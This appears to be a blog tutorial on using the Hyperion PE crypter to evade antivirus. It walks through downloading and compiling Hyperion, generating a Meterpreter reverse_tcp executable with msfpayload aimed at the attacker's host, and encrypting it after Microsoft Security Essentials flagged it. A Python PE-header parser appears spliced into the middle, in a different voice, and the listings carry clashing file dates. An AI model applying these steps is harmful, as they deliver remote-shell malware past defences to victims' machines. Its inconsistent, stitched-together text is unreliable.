Hyperion : PE Crypters Exploit

PE Crypters (Hyperion)

I recently watched a presentation that rel1k gave at BSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated binary droppers, Shellcodeexec, PowerShell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted with a deliberately weak 128-bit AES key and wrapped in a stub that simply brute-forces that key at execution time before handing control to the decrypted image. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools needed to cross-compile Windows executables.
1. root@bt:/opt# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
2. root@bt:/opt# unzip Hyperion-1.0.zip
3. root@bt:/opt# cd Hyperion-1.0
4. root@bt:/opt/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
5. root@bt:/opt/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2013-07-18 17:52 crypter.exe

Now that we have our Hyperion crypter executable, let’s create a Metasploit payload to feed it.
6. root@bt:/opt/Hyperion-1.0# msfpayload windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=4444 X > Test.exe
7. root@bt:/opt/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2013-07-18 17:53 crypter.exe
-rw-r--r-- 1 root root  73802 2013-07-18 16:53 Test.exe

Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.

As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.
8. root@bt:/opt/Hyperion-1.0# wine crypter.exe Test.exe encrypted_Test.exe

Opening Test.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_Test.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

9. root@bt:/opt/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_Test.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 Test.exe
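The crypter log above is mostly a walk of the PE headers: MZ signature, e_lfanew, PE signature, optional-header magic, image base, the number of data directories, and one line per section-table entry. The same walk is what an analyst does when triaging a suspicious binary, so here is an added example (my code, not Hyperion's or nullsecurity's) that reproduces it in Python using only the standard library. It builds a constructed minimal PE32 whose section table matches the values Hyperion printed for Test.exe, parses it back, flags sections whose virtual size exceeds their raw size (regions filled at run time, which is where a packer or crypter stub writes its decoded image), and reproduces the "input size + checksum, rounded up to the key size" arithmetic from the log, assuming a 4-byte checksum and a 16-byte key as the numbers in the log imply.

```python
import struct

# Section-table values as printed by Hyperion for Test.exe (name, VSize, VAddress, RawSize, RawAddress).
SAMPLE_SECTIONS = [
    (b".text",  0xa966, 0x1000,  0xb000, 0x1000),
    (b".rdata", 0xfe6,  0xc000,  0x1000, 0xc000),
    (b".data",  0x705c, 0xd000,  0x4000, 0xd000),
    (b".rsrc",  0x7c8,  0x15000, 0x1000, 0x11000),
]

PE32_MAGIC = 0x10B
OPTIONAL_HEADER_SIZE = 224   # PE32 optional header with 16 data directories
SECTION_HEADER_SIZE = 40


def build_sample_pe(sections=SAMPLE_SECTIONS, e_lfanew=0xE8, image_base=0x400000):
    """Construct a minimal PE32 header-only image (constructed sample, not a real binary).

    Layout: DOS header with e_lfanew at 0x3c, PE signature, 20-byte COFF header,
    224-byte PE32 optional header, then one 40-byte IMAGE_SECTION_HEADER per section.
    """
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\x00" * (e_lfanew - len(dos))
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE | 32BIT_MACHINE).
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, OPTIONAL_HEADER_SIZE, 0x0102)
    opt = bytearray(OPTIONAL_HEADER_SIZE)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)     # Magic
    struct.pack_into("<I", opt, 28, image_base)    # ImageBase (offset 28 in PE32)
    struct.pack_into("<I", opt, 92, 16)            # NumberOfRvaAndSizes
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), vsize, vaddr, rawsize, rawaddr,
                    0, 0, 0, 0, 0)
        for name, vsize, vaddr, rawsize, rawaddr in sections
    )
    return dos + b"PE\x00\x00" + coff + bytes(opt) + table


def parse_pe(data):
    """Walk the headers the way the crypter log does and return the fields it printed."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff_off)
    opt_off = coff_off + 20
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic != PE32_MAGIC:
        raise ValueError("not a PE32 file (optional header magic 0x%x)" % magic)
    image_base = struct.unpack_from("<I", data, opt_off + 28)[0]
    num_dirs = struct.unpack_from("<I", data, opt_off + 92)[0]
    sec_off = opt_off + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawaddr = struct.unpack_from(
            "<8sIIII", data, sec_off + SECTION_HEADER_SIZE * i)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii"),
                         "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawaddr": rawaddr})
    return {"e_lfanew": e_lfanew, "image_base": image_base,
            "num_dirs": num_dirs, "sections": sections}


def runtime_filled_sections(pe):
    """Names of sections whose virtual size exceeds what is stored on disk.

    Such regions are zero-filled by the loader and written at run time: ordinary
    uninitialised data, or, in a packed/crypted binary, the decoded payload image.
    """
    return [s["name"] for s in pe["sections"] if s["vsize"] > s["rawsize"]]


def padded_input_length(file_size, checksum_len=4, key_size=16):
    """Reproduce the log's 'input size + checksum, rounded up to the key size' arithmetic
    (assumed 4-byte checksum and 16-byte key, which is what the printed values imply)."""
    total = file_size + checksum_len
    return (total + key_size - 1) // key_size * key_size


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print("Found pointer to PE Header: 0x%x" % pe["e_lfanew"])
    print("Number of Data Directories: %d" % pe["num_dirs"])
    print("Image Base: 0x%x" % pe["image_base"])
    for s in pe["sections"]:
        print("Found Section: %s" % s["name"])
        print("VSize: 0x%x, VAddress: 0x%x, RawSize: 0x%x, RawAddress: 0x%x"
              % (s["vsize"], s["vaddr"], s["rawsize"], s["rawaddr"]))
    print("Run-time filled sections:", runtime_filled_sections(pe))
    print("Padded input length for Test.exe: 0x%x" % padded_input_length(73802))
```

Run as a script it prints the same section lines as the crypter, and the padded length for the 73802-byte Test.exe comes out at 0x12050, matching the log. Point `parse_pe` at the bytes of any real PE32 file to get the same summary; it is a header walk only and does not decrypt or run anything.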
And if we copy our encrypted payload to our Windows host…
Happy Crypting!

About Lasha Gogua